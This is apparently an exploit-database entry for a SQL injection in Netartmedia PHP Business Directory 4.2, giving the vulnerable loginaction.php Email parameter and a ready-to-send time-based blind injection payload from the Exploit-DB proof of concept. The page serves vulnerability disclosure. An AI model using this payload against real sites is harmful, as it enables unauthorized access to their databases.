header-logo
Suggest Exploit
vendor:
PHP Business Directory
by:
Ahmet Ümit BAYRAM
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: PHP Business Directory
Affected Version From: 4.2
Affected Version To: 4.2
Patch Exists: NO
Related CWE: N/A
CPE: a:netartmedia:php_business_directory:4.2
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Kali Linux
2019

Netartmedia PHP Business Directory 4.2 – SQL Injection

Netartmedia PHP Business Directory 4.2 is vulnerable to SQL Injection. An attacker can exploit this vulnerability by sending a specially crafted payload to the 'Email' parameter in the 'loginaction.php' page. The payload used in this exploit is 'Email=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&Password=g00dPa%24%24w0rD&lang=en&mod=login' which will cause the application to sleep for 0 seconds if the current date is equal to the system date.

Mitigation:

Developers should ensure that user input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

# Exploit Title: Netartmedia PHP Business Directory 4.2 - SQL Injection
# Date: 19.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.phpbusinessdirectory.com/
# Demo Site: https://www.bizwebdirectory.com/
# Version: 4.2
# Tested on: Kali Linux
# CVE: N/A
 ----- PoC SQLi -----

Request: http://localhost/[PATH]/USERS/loginaction.php
Parameter: Email (POST)
Payload: Email=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&Password=g00dPa%24%24w0rD&lang=en&mod=login

Navigation

Suggest Exploit

Services By CQR